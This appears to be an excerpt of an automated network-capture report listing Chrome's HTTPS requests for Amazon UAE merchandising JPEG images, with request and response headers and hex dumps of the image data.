                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 05 53 30 88 49 3a 70 d5 a2 eb 11 73 02 85 0f 27 64 e7 a7 f5 86 c8 a9 23 e7 7a f6 76 f5 76 ac 17 76 b3 93 1b 44 51 1c 1e 54 8f e3 60 de cb 3d 5f 49 aa 24 75 0c 95 2b 7d 15 2c 82 a8 b6 9a 49 b3 57 a2 a1 88 64 e0 81 11 4b 03 b3 c1 35 4b 95 52 25 13 0e 90 14 51 51 ca 44 4c 39 0d b8 4a 55 08 39 98 a6 a8 f6 e3 8c 7d 3c 99 e5 66 49 43 c4 1a 72 f3 28 9a 71 70 17 2c a9 23 15 cc c7 1d f9 ad a8 de 85 74 45 07 03 3d d9 87 42 d7 2e 88 a1 75 b4 51 0c 51 20 8b 30 3e 1c f5 30 4c d2 07 3f d1 a6 36 aa d2 dc cd 6f 76 62 8f 38 62 e9 0a 64 c7 76 70 c3 16 62 a2 72 8b 37 02 72 16 44 ca 2d 66 68 82 86 92 29 be 5b 22 78 b6 68 73 3c 91 30 72 41 ba 05 32 89 c4 a5 a1 87 43 de 61 32 d6 40 35 8a 8c 87 f6 58 b6 54 40 67 18 1c 5f 2e 54 d2 31 ca ae 0b 0d a9 a5 15 24 63 84 ce 1e 45 b2 c7
                                                                                                                                                                                                        Data Ascii: S0I:ps'd#zvvvDQT`=_I$u+},IWdK5KR%QQDL9JU9}<fICr(qp,#tE=B.uQQ 0>0L?6ovb8bdvpbr7rD-fh)["xhs<0rA2Ca2@5XT@g_.T1$cE
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: fd 9d 9f fc 93 ab 70 70 f8 55 5b fc 0c ed 78 a6 91 fd 34 b3 4e 25 f6 cd 91 76 66 0d da bf 9a b8 68 a3 45 c9 48 a9 51 bf 7f 3e 54 8e a8 bd e0 e9 2a f1 66 b5 1c 3a ca 8a 8c 98 8b 75 59 a7 78 92 72 f7 81 78 8d ee f6 3d de a9 16 d9 50 48 c0 ee e2 22 22 98 38 7f 0b 52 48 31 96 68 91 cc 47 5c 1c 3e 15 56 ff 00 03 3b 55 ef a5 af 36 f2 7c 05 68 f8 cc e0 63 55 3a 4e 0b 5e dc ec 45 2b 4d ad 51 d3 92 2e d2 90 84 d1 a8 a0 d2 d5 0b aa 9e ea 5c 49 bf 36 77 fa 8b e4 5e 2b 76 10 75 55 5f 1b 3b 4e 44 cf 84 14 1a 67 49 59 73 5d d5 03 e0 03 09 06 3b 57 6b 6b ca 82 ba 5b 5f fc e2 84 8d 86 a5 19 e2 77 53 2a 82 ab a5 78 14 29 10 ba 46 91 88 10 0c ee 91 49 27 19 ae 76 a1 db f4 3c 68 28 7c ee e1 b1 66 ea dc 23 7e 35 a6 7f 2e bd 9a 70 8a d5 5a b6 6d e0 7e 7d 5d 32 13 3d de 56 de
                                                                                                                                                                                                        Data Ascii: ppU[x4N%vfhEHQ>T*f:uYxrx=PH""8RH1hG\>V;U6|hcU:N^E+MQ.\I6w^+vuU_;NDgIYs];Wkk[_wS*x)FI'v<h(|f#~5.pZm~}]2=V
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 1f dc 51 b6 ce 8f ee 28 db 67 47 f7 14 6d b3 a3 fb 8a 36 d9 d1 fd c5 1b 6c e8 fe e2 8d b6 74 7f 71 46 db 3a 3f b8 a3 6d 9d 1f dc 51 b6 ce 8f ee 28 db 67 47 f7 14 6d b3 a3 fb 8a 36 d9 d1 fd c5 1b 6c e8 fe e2 8d b6 74 7f 71 46 db 3a 3f b8 a3 6d 9d 1f dc 51 b6 ce 8f ee 28 db 67 47 f7 14 6d b3 a3 fb 8a 36 d9 d1 fd c5 1b 6c e8 fe e2 8d b6 74 7f 71 46 db 3a 3f b8 a3 6d 9d 1f dc 51 b6 ce 8f ee 28 db 67 47 f7 14 6d b3 a3 fb 8a 36 d9 d1 fd c5 1b 6c e8 fe e2 8d b6 74 7f 71 46 db 3a 3f b8 a3 60 60 c4 a2 06 2b 34 8a 62 f5 4d fe 7b a9 b8 40 4f 44 56 f3 34 54 25 df 1e a5 77 18 a0 91 2b 27 c2 46 4e 1d eb 44 6b db b2 90 a4 d8 3c 1c 08 fd 8b d6 92 6c 9a 48 b0 70 57 4c 5f 26 45 5a 39 f1 c2 f1 69 d1 ae 8d 77 60 2b 0d 42 44 b4 a7 f9 a0 b5 3c 1d 21 c2 5a a4 9b a8 9e ec f8 b4
                                                                                                                                                                                                        Data Ascii: Q(gGm6ltqF:?mQ(gGm6ltqF:?mQ(gGm6ltqF:?mQ(gGm6ltqF:?``+4bM{@ODV4T%w+'FNDk<lHpWL_&EZ9iw`+BD<!Z
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 7c b5 ed 70 dc 1d 03 5a 0d a2 a8 dc 2c 74 a1 f7 24 29 f2 ef 4f f6 4f cb c2 79 8b db e4 9c c0 2d eb 10 d2 c7 88 83 04 ae ca b8 64 d9 9f 11 1a fa 5e d5 02 e1 da 4e 3b ec fc 79 e4 d6 c6 b1 09 84 76 b2 b1 5f b2 fd 14 e7 8e a1 77 fe 8d 8e f1 71 45 72 1b 32 8e 4e 4e 1e 63 fc 9b 46 d9 67 11 4d 86 0d 97 de 38 3e e8 d4 d0 f1 98 2f 14 0f 59 ab ce 73 c6 66 f4 93 7e fb cf 5e df 05 ce de 4b ae a7 66 79 ab 90 1d a3 f2 9f 75 7e d6 2b da 3d 7a 0f 79 09 45 b2 49 f4 64 63 2a e7 8d 86 76 e4 3b 87 28 ac 62 a8 c6 43 fc a1 88 9a 72 71 46 3c b1 99 48 c3 af 88 37 6f e0 fb e4 eb f1 fc ab 78 bc 7c 58 ff 00 8b 8c 3a bc 07 33 78 1e 8e 7f 4f 92 eb bb 21 e6 ab 6b 70 e4 f2 72 58 e9 5c 9c 6c 5a e5 af 6a f5 ef ef 25 9d f0 f8 49 7f d1 70 aa ac b2 bc a6 24 46 1c 57 26 2b 8d f7 ac 2e 3a 2f
                                                                                                                                                                                                        Data Ascii: |pZ,t$)OOy-d^N;yv_wqEr2NNcFgM8>/Ysf~^Kfyu~+=zyEIdc*v;(bCrqF<H7ox|X:3xO!kprX\lZj%Ip$FW&+.:/


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        87192.168.2.449865151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC722OUTGET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986217_UAE_Budget_Store_AE_xsite_bubbler_HPC_en_400x400_2X._CB644457597_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC660INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 68782
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 7837bfbb-7292-4e0c-8d18-a2a10691815e
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 17 Aug 2021 17:25:24 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sat, 16 Jul 2044 14:45:11 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1461060
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:05 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000065-IAD, cache-ewr-kewr1740035-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 02 01 01 01 02 02 02 01 01 02 02 02 02 02 02 02 02 02 03 02 03 03 03 03 02 03 03 04 04 04 04 04 03 05 05 05 05 05 05 07 07 07 07 07 08 08 08 08 08 08 08 08 08 08 01 01 01 01 02 02 02 05 03 03 05 07 05 04 05 07 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 ff c2 00 11 08 01 90 01 90 03 01 11 00 02 11 01 03 11 01 ff c4 00 3b 00 01 00 02 02 02 03 01 01 00 00 00 00 00 00 00 00 00 08 09 07 0a 05 06 02 03 04 01 0b 01 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 08 04 05 06 07 02 03 09 01 0a ff da 00 0c 03 01 00 02 10 03 10 00 00 00 df e0 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF;
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 36 29 3f 70 5c 9e 87 dd 9a fb 84 fa a9 af 3d 59 d7 3b f5 04 a2 9d fe 56 fa 0d 09 fd 0d f2 2f 7a 88 47 d1 a4 a7 b9 70 f7 1b c9 ed 75 d0 39 fd 80 75 5c af b2 d3 c2 9d 7b b9 6f f1 f9 e9 9c 12 53 57 e4 a0 00 00 03 b1 65 56 7b 59 f6 9a 04 7d 55 9d 02 3e c6 1d bb 5f 9e 60 cb 90 00 00 7d 5e d3 c0 ab 46 c9 6c 9e 74 bc 21 7f 67 64 7e bb 74 e5 9b 6e 77 5e 76 6d e1 67 39 4c 54 9c dd bc 35 b1 f0 7a 6e 6a 3d e8 8f 57 6b d5 13 d2 68 4f 5f 2d b1 4f 2e ac 8d d7 df 98 ae 18 c6 5c c2 37 d7 b3 cd af 4d 68 36 40 c2 cf e8 0d 07 f1 ed 66 7d ab 86 39 9b 7a eb ac 91 f3 b3 10 f2 e5 92 ba ba eb 46 af ee ce 3e 17 ce 59 13 aa 32 b0 00 00 00 2c 0f d3 e8 8d 20 a4 f6 a2 15 ed e5 ec bd c0 71 97 6c 80 00 03 eb f6 aa 05 c9 8b f6 49 8c 78 5e 7c 6e da a7 15 fd a6 ec 16 9d 9d 03 ec 9b a6 e4
                                                                                                                                                                                                        Data Ascii: 6)?p\=Y;V/zGpu9u\{oSWeV{Y}U>_`}^Flt!gd~tnw^vmg9LT5znj=WkhO_-O.\7Mh6@f}9zF>Y2, qlIx^|n
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 2c 93 18 ae 3f 30 3d 86 b8 5c 5e 36 4a 1c 3a ce 00 00 00 07 73 cf f1 af ba e5 4b 8f b5 76 5e 00 00 01 c2 7a b1 0a 27 d6 3b 4b 91 77 c6 37 49 f5 7b de ad 21 36 ff 00 c8 d4 fb 22 69 75 6a 99 45 80 eb dc 91 41 60 af c8 b5 b4 b4 87 f5 97 56 f5 3b be f2 e0 75 a6 de bf a8 ff 00 99 4b 0f b8 b5 3d 6d dc 46 93 73 1d b3 25 75 5c 9c e3 36 7f 9d fb 6e c3 7d fb 9d f3 dc 67 3d 6d ad 19 06 ea ad b8 ea a6 8e 50 db ef 9c d6 1b b1 20 de a2 dd d6 f3 80 47 f9 61 8f e3 20 00 00 00 64 1d a3 88 73 b9 1d af 10 e8 bd 86 00 00 01 ae 27 a3 3b 57 08 5b e5 dc 90 d5 3a e2 cc 37 14 12 d4 ef 74 cd 7b 3d ef d6 1d ee aa b3 9a b2 f4 c4 5c 62 49 ec 31 e3 74 11 d1 2b d8 e8 dd 8b f2 fd a5 c5 eb 2d c3 b1 b4 69 da 72 de ff 00 aa 75 d5 df 58 a5 68 b7 9e 7a d7 5b bb 95 ce 20 e6 db f0 a6 4c 4b 2d
                                                                                                                                                                                                        Data Ascii: ,?0=\^6J:sKv^z';Kw7I{!6"iujEA`V;uK=mFs%u\6n}g=mP Ga ds';W[:7t{=\bI1t+-iruXhz[ LK-
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: de 2d 15 b5 6f 22 f5 65 83 e8 fd 87 f9 f5 5f 3b bf 5e 56 ae ff 00 d6 9e fe 1c ed b2 32 6d ba 8f 93 ba 87 25 58 2e 77 e7 0a b7 ff 00 72 b5 56 61 ac ae cd 40 13 66 3e cf bd 29 b0 3b c5 9e be b4 a4 0e b2 bc 98 7b bc e4 ae bf c9 80 02 52 4c ad 15 38 7d 12 8b c0 00 38 5b 05 ca ae 7c 70 9d 3d 6b 11 bd 80 00 00 00 00 00 00 00 00 00 00 00 00 00 03 b2 e5 d6 4b 46 f6 3e 0b 73 57 fb 68 00 01 82 a3 8e d3 af 0f 2c e6 17 e7 1f a0 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 79 7c b0 ff 00 53 21 ee 75 91 da b0 00 00 03 aa 61 57 ff 00 4f 4f 60 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 77 77 5f 6b cd 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 15 ca 8a ef 6d b5 b4 67 74 a0 bc cb 5d 78 00 6b 05
                                                                                                                                                                                                        Data Ascii: -o"e_;^V2m%X.wrVa@f>);{RL8}8[|p=kKF>sWh,?y|S!uaWOO`ww_klRmgt]xk
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 57 ff 00 06 26 e3 df 7d 8f b1 0e 3d f5 5a 2f d1 0a 63 df 3d a7 da 1a 61 d9 8e db 45 d0 e8 98 ad 9b cc 88 4c 71 51 f2 b6 35 c5 1f 6f ad 34 f7 0e 70 c5 01 a4 c8 7f 08 00 6a bc c4 cc d9 c2 a2 3c 7a c7 2b 4a 5e 3b c3 2a 32 75 7b 59 09 b3 54 8f ed ee 4c a5 99 6b a2 ae 66 b6 90 8f 14 59 06 13 91 2b 2d 60 5c c4 6c da e9 1c c4 77 2a a6 ef 98 c1 97 c6 6f 0d eb e7 1b eb f4 32 4e 91 c6 af 5e ff 00 a0 8e 72 bd ca e7 2e ae 77 7a fc 04 88 77 76 a3 70 e8 c5 6f 89 34 c7 0d d8 41 3d dd 89 eb c2 b4 82 29 e3 19 bb 24 45 7a 8c ec 03 78 8f 44 f5 61 2b 62 20 f6 ba 58 9b 23 4d dc 13 b5 a3 7e 88 bd f8 5e e7 62 b4 04 2c 28 5a 1b 51 2b 53 7c 60 69 c3 d1 a8 d4 6b 75 46 fb 99 f4 af 0e 54 b5 56 3b 63 89 c2 66 b7 8b ac e0 aa f6 ab 23 b1 11 47 c3 e4 87 e4 37 88 e2 27 97 0f 67 53 5e f9
                                                                                                                                                                                                        Data Ascii: W&}=Z/c=aELqQ5o4pj<z+J^;*2u{YTLkfY+-`\lw*o2N^r.wzwvpo4A=)$EzxDa+b X#M~^b,(ZQ+S|`ikuFTV;cf#G7'gS^
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 96 6b bd 55 46 bb d7 c2 ec 00 a4 5e c6 21 c2 82 21 11 ce e9 0b 5e ba 72 2e bd 81 8e 98 ab e2 25 bd 52 85 ad 71 92 40 78 4d 1e 5c b0 8b 60 b3 01 52 28 24 52 4b 49 08 fa a9 71 2b a7 4a ac 13 88 29 c0 9a c2 4f 91 1e fa 70 4c c9 93 e3 14 79 89 05 26 a2 a0 d4 d3 6d a6 f3 8e 84 39 67 49 64 7b ab e0 0a fb 9f 96 92 df 06 79 05 22 39 c9 83 42 8f 16 0c 43 07 86 9c ce bc 34 84 bb 33 d5 62 a7 ac ad f7 2d f2 c4 fb 5b e9 a4 8c e8 cd 47 6c 76 c8 9d 1f db 76 7e 59 0d 8b 89 3d 1c 5b 15 51 c4 bd 10 be ef ec c2 c1 55 3f e2 05 57 7a b0 6e 8f 6e 5a c4 47 db 44 36 98 9d 91 ed 40 37 91 d2 22 6c 6f 89 f5 01 74 6a aa e0 3d 11 1e 10 09 af f4 95 c5 de 0d 9e b1 7b b6 24 df 23 6f a8 7d 9e 86 b3 c4 4f c4 ec 5c da 2d 45 72 cb 60 39 a2 ab c6 30 02 7d e9 61 ce 91 05 62 a2 6d 84 e9 40 3c
                                                                                                                                                                                                        Data Ascii: kUF^!!^r.%Rq@xM\`R($RKIq+J)OpLy&m9gId{y"9BC43b-[Glvv~Y=[QU?WznnZGD6@7"lotj={$#o}O\-Er`90}abm@<
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: cc a6 48 d1 80 43 49 e5 e2 3f 88 37 2e 57 09 53 8d 25 b6 f1 2c e1 9d a9 b5 b0 49 ad 85 a0 d0 48 c4 47 35 78 8b e1 76 23 b9 1e ee 0a b9 9a ea fd 83 e9 19 57 af fc ad 55 79 78 fa e2 a6 23 db 6f 52 bc 46 b9 14 e1 ed 3c cb 28 f6 f3 de fb fd 23 c1 92 af 75 60 a7 5c 1e 38 36 e6 b1 4a 72 87 b0 a5 bb e6 18 32 87 33 89 c3 d7 8e 3c 44 7e 62 b0 e2 c2 0e 63 1c bb 10 b1 8a 57 4d 85 99 1e af 74 3b 31 8d 37 ee 10 92 b7 36 39 f1 1c 6b 66 27 04 ce 7c 8c 59 7e d4 97 f9 d6 61 a8 8a de df ab 12 cc c6 1d 91 e3 0f 89 34 ac 77 91 0e 78 6b e1 f9 45 e7 24 2f 7b 2c 6f ad a5 2b 98 d3 f2 22 fb 08 21 ef e2 39 38 85 f6 b1 bc 38 3e 0b 8a 5d dd 5c 0d 53 b3 cb db e9 2a dd e7 9e df b4 dc 58 2e b2 89 f7 69 e8 95 9b 9f 07 b5 bf 2c 6f 9a 1b d4 d5 73 f8 92 76 a2 f3 0c 64 9c a9 10 80 b1 af 79
                                                                                                                                                                                                        Data Ascii: HCI?7.WS%,IHG5xv#WUyx#oRF<(#u`\86Jr23<D~bcWMt;1769kf'|Y~a4wxkE$/{,o+"!988>]\S*X.i,osvdy
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: c2 62 99 51 6b 63 69 ea dc 8b e9 23 fc a0 1f 89 b8 95 f2 93 7e 25 f4 55 ef 1b 78 9a 91 a9 e5 3f 0b 20 3e 57 9e 1f d3 c3 89 e4 93 86 e6 ef f2 b8 6b 34 19 81 d1 b5 23 23 ba 57 66 ec 44 cd 71 63 c5 18 c6 e7 3d ec ef c0 b3 aa 37 4f 30 ed 13 4e d8 79 be bc aa 8d 79 1a 3f ba 5b ab ac 90 4f dc 44 70 35 58 e5 09 42 2d e9 c6 71 75 47 26 f1 77 8c db 53 44 57 72 e6 e9 07 7f be 79 7b f5 dd b0 18 44 47 09 8a aa ae d1 18 8d c4 2f 8e 18 7c 1a 2f 90 91 c9 b0 3a 91 da af 6a a0 db e5 07 c8 d4 ca cd 15 98 ce 6c 4e ae ad 32 33 66 e3 39 15 03 dc 98 6b bb 31 4f fa d3 4f fc c0 71 2b e5 d3 3f 88 ec 45 68 55 3c a2 a8 b1 cb b4 88 f4 69 18 4d 35 ec 3d 64 77 ef 72 70 9c 88 9d b8 65 44 66 23 1c 36 0f 73 b4 d8 80 88 82 da dd e2 66 ed 7b 0a 31 23 75 59 89 b5 3c 68 4c 52 7e 8d 07 ef 27
                                                                                                                                                                                                        Data Ascii: bQkci#~%Ux? >Wk4##WfDqc=7O0Nyy?[ODp5XB-quG&wSDWry{DG/|/:jlN23f9k1OOq+?EhU<iM5=dwrpeDf#6sf{1#uY<hLR~'
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 39 d4 f5 4e 72 ee 73 a3 01 5c ec 32 54 52 3f 86 39 2c 21 13 fb bc 16 4c 70 69 c7 3b 03 af 76 3a 47 54 72 52 aa 2e a8 bc c6 8b 5b fa 3a 07 f0 45 82 c8 8e 0d 38 e7 60 75 ee c3 08 c2 b5 1e 37 a1 18 bd cf c2 aa 37 b5 cb a7 bb 9e 2c 24 71 2b 69 e0 91 59 26 53 d1 ce c6 46 b0 91 c6 b2 a7 9c 47 3e 40 1d bd 9e e5 5c 6b 2b bb 59 30 85 68 48 fb 78 8f dd ef 26 eb ff 00 50 ae 0b 12 45 5e 53 99 18 b2 94 f2 23 80 ff 00 95 65 ea 9b 2b f1 c9 23 6e 8b 17 96 56 a6 93 aa f3 46 5c 1a cf 8b 6c f9 91 c5 f1 c9 97 2f 19 7b 07 8c ad 41 c9 0a ed 94 2c 66 1b 86 d2 56 92 5e 9b ce ef 22 28 eb f2 ed b6 67 12 59 5a d9 b8 41 37 68 47 49 96 a5 52 cc e2 36 dd f2 a1 6d 56 f2 99 ce fe 5c 37 82 a6 b9 ca 39 52 93 52 95 72 14 e5 07 33 d6 ca b6 9a 6b a6 4c be 97 24 a7 a7 b2 7a 92 44 74 55 09 3e
                                                                                                                                                                                                        Data Ascii: 9Nrs\2TR?9,!Lpi;v:GTrR.[:E8`u77,$q+iY&SFG>@\k+Y0hHx&PE^S#e+#nVF\l/{A,fV^"(gYZA7hGIR6mV\79RRr3kL$zDtU>
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: da a1 6a aa f7 af 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 70 00 9d a8 16 a2 a7 72 ff 00 ee bc c7 9b df 43 6d 57 58 d8 29 25 2c 76 ea 6c 5c 67 17 d5 66 5a ca 04 80 86 6d 82 c7 45 95 f0 60 e6 2b 83 74 81 2e 90 93 37 56 0b 89 b2 35 c5 b4 4a 48 24 b1 9b bb 97 12 b5 1d
                                                                                                                                                                                                        Data Ascii: j/3`r1/3`r1/3`r1/3`r1/3`r1/3`r1/3`r1/3`r1/3`r1/3`prCmWX)%,vl\gfZmE`+t.7V5JH$


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        88192.168.2.449866151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC722OUTGET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986221_UAE_Budget_Store_AE_xsite_electronics_en_400x400_2X._CB644457597_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC659INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 50354
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: f1799056-ab41-4b42-8c2a-23c08c5de8eb
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 17 Aug 2021 17:25:25 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Thu, 24 Mar 2044 11:36:33 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 789209
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:05 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100138-IAD, cache-ewr-kewr1740025-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 02 01 01 01 02 02 02 01 01 02 02 02 02 02 02 02 02 02 03 02 03 03 03 03 02 03 03 04 04 04 04 04 03 05 05 05 05 05 05 07 07 07 07 07 08 08 08 08 08 08 08 08 08 08 01 01 01 01 02 02 02 05 03 03 05 07 05 04 05 07 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 ff c2 00 11 08 01 90 01 90 03 01 11 00 02 11 01 03 11 01 ff c4 00 3a 00 01 00 01 05 00 03 01 01 00 00 00 00 00 00 00 00 00 09 05 06 07 08 0a 02 03 04 01 0b 01 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 05 06 07 09 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ef e0 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIF:
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: c5 36 96 a7 bd bb 6a 56 00 00 00 33 ae ef f5 f9 c4 4d 67 e2 d2 8e 19 a7 b7 12 de e9 12 bc 76 93 77 3b a3 cf 58 6d f1 fa 6e 1b 36 bf d6 9e 97 a7 58 00 00 22 e6 4f e2 38 78 96 d8 63 ac 6d 5a cb df 7f c9 ec 00 00 00 00 02 e2 ba a8 f2 b3 ba 68 11 f5 7d 9e 03 5f 63 0e 5d 8f cd 60 cb 90 00 00 01 8b 77 7b af e8 67 fb fe db d6 d7 cc f7 7d b1 99 e5 2a f6 8e f6 e5 d1 86 2f fe 79 d2 5e 9d f9 87 f3 f5 dc ab 46 bb d5 46 96 27 78 00 00 39 bf dc 54 1b 85 8c c1 66 df 18 1b 21 77 41 aa 19 93 f7 d3 3e b0 00 00 00 00 12 07 b3 e8 8d b0 52 7b 11 08 f6 d5 ec bd c0 71 97 2c 80 00 00 0d 85 dd fe bf 34 d2 81 9e f1 ff 00 c5 75 e5 ea 8d 9f b7 77 96 02 c6 fe bf 1d 2b 94 62 f9 f6 e3 ef af bd 52 cd b8 3b f4 d2 dc ed 00 00 04 28 ed 86 1a 68 86 5c b2 f6 fe 06 c8 99 dd 87 19 d3 f7 cf b0
                                                                                                                                                                                                        Data Ascii: 6jV3Mgvw;Xmn6X"O8xcmZh}_c]`w{g}*/y^FF'x9Tf!wA>R{q,4uw+bR;(h\
